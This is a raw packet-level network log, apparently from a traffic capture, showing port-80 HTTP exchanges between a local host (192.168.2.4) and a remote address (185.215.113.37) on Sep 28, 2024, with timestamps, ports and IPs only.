Sep 28, 2024 21:26:16.267952919 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.267966032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.267976999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.267977953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.267991066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.267996073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268021107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268049955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268162012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268174887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268184900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268196106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268208981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268208981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268234968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268290997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268367052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268378973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268389940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268421888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268421888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268457890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268523932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268536091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268546104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268557072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268568039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268573999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268573999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268605947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268635988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268793106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268805027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268815041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268826008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268837929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268850088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268851042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268862963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268872023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268876076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.268892050 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268928051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.268928051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269146919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269160032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269191027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269222021 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269242048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269253969 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269263983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269274950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269285917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269287109 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269298077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269306898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269324064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269351006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269530058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269548893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269560099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269571066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269591093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269593000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269593000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269602060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269614935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269623041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269623041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269624949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269639015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269649029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269649029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269649029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269663095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269674063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269680023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269686937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.269700050 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.269721031 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270165920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270176888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270186901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270198107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270210028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270226002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270226955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270226955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270237923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270251989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270277023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270473003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270484924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270494938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270505905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270518064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270520926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270560980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270560980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270648003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270659924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270669937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270680904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270692110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270693064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270704985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270710945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270716906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270729065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270741940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270752907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270754099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270754099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270765066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270773888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270783901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270797014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.270816088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270816088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270838976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.270838976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271565914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271578074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271586895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271600008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271610022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271620989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271624088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271632910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271646023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271646976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271657944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271668911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271681070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271683931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271683931 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271692991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271704912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271708965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271718025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271727085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271730900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271743059 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271744013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271756887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271760941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271769047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271780014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271784067 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271792889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.271812916 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.271830082 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272474051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272486925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272495985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272506952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272517920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272526026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272531033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272543907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272547960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272556067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272564888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272569895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272582054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272586107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272594929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272607088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272607088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272618055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272625923 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272633076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272644997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272645950 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272658110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272664070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272670984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.272680998 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272700071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.272727966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360611916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360626936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360639095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360656977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360666990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360676050 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360677958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360690117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360719919 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360719919 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360843897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360853910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360866070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360876083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360886097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360888004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360904932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.360913992 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360940933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.360940933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361131907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361143112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361151934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361161947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361172915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361179113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361183882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361197948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361201048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361219883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361251116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361449003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361459970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361469030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361478090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361488104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361494064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361498117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361510992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361514091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361521959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361541033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361541033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361572027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361738920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361783028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361805916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361818075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361834049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361845970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361856937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.361857891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361859083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361898899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.361898899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.362118959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362129927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362139940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362149954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362160921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362170935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362171888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.362185955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362194061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.362198114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.362215042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.362246037 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.362246990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.398802042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.403610945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621262074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621275902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621284008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621347904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621356010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621357918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621370077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621381044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621388912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621413946 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621414900 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621450901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621494055 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621553898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621563911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621572971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621582031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621592045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621594906 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621603012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621614933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621619940 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621639967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621666908 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621854067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621864080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621872902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621881008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621896982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621901035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621906996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621917963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.621921062 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621942043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.621969938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622140884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622150898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622159958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622185946 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622201920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622204065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622211933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622221947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622231960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622241020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622246027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622266054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622287035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622493982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622504950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622541904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622565031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622575998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622584105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622594118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622603893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622606993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622616053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622627020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622637987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.622651100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622651100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622680902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.622680902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623018980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623028994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623038054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623047113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623056889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623066902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623071909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623071909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623107910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623107910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623330116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623343945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623352051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623361111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623369932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623378038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:16.623394966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623404980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:16.623414993 CEST	80	49732	185.215.113.37	192.168.2.4
